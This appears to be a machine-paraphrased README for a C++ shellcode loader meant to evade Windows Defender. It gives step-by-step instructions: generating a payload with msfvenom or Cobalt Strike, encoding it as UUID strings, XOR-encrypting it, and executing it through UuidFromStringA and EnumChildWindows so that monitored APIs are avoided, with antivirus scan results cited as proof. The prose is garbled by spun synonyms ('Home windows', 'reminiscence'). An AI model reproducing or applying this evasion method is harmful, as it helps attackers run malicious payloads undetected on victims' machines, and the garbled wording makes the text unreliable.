Introduction
One other shellcode injection method utilizing C++ that makes an attempt to bypass Home windows Defender utilizing XOR encryption sorcery and UUID strings insanity :).
Shellcode era
-
Firstly, generate a payload in binary format( utilizing both
CobaltStrike
ormsfvenom
) as an example, inmsfvenom
, you are able to do it like so( the payload I am utilizing is for illustration functions, you need to use no matter payload you need ):msfvenom -p home windows/messagebox -f uncooked -o shellcode.bin
-
Then convert the shellcode( in binary/uncooked format ) right into a
UUID
string format utilizing the Python3 script,bin_to_uuid.py
:./bin_to_uuid.py -p shellcode.bin > uuid.txt
-
xor
encrypt theUUID
strings within theuuid.txt
utilizing the Python3 script,xor_encryptor.py
../xor_encryptor.py uuid.txt > xor_crypted_out.txt
-
Copy the
C-style
array within the file,xor_crypted_out.txt
, and paste it within the C++ file as an array ofunsigned char
i.e.unsigned char payload[]{your_output_from_xor_crypted_out.txt}
Execution
This shellcode injection method includes the next subsequent steps:
- First issues first, it allocates digital reminiscence for payload execution and residence through
VirtualAlloc
- It
xor
decrypts the payload utilizing thexor
key worth - Makes use of
UuidFromStringA
to transformUUID
strings into their binary illustration and retailer them within the beforehand allotted reminiscence. That is used to keep away from the utilization of suspicious APIs likeWriteProcessMemory
ormemcpy
. - Use
EnumChildWindows
to execute the payload beforehand loaded into reminiscence( in step 1 )
- It does not use normal features like
memcpy
orWriteProcessMemory
that are identified to boost alarms to AVs/EDRs, this program makes use of the Home windows API operate referred to asUuidFromStringA
which can be utilized to decode knowledge in addition to write it to reminiscence( Is not that nice people? And please do not say “NO!” 🙂 ). - It makes use of the operate name obfuscation trick to name the Home windows API features
- Lastly, as a result of it seems distinctive 🙂 ( Is not it? 🙂 )
- It’s a must to change the
xor
key(row 86) to what you would like. This may be accomplished within the./xor_encryptor.py
python3 script by altering theKEY
variable. - It’s a must to change the default
executable filename
worth(row 90) to your filename. - The command for compiling is offered within the C++ file( across the prime ). NB:
mingw
was used however you need to use whichever compiler you favor. 🙂
Compile
The binary was scanned utilizing antiscan.me on 01/08/2022.
https://analysis.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/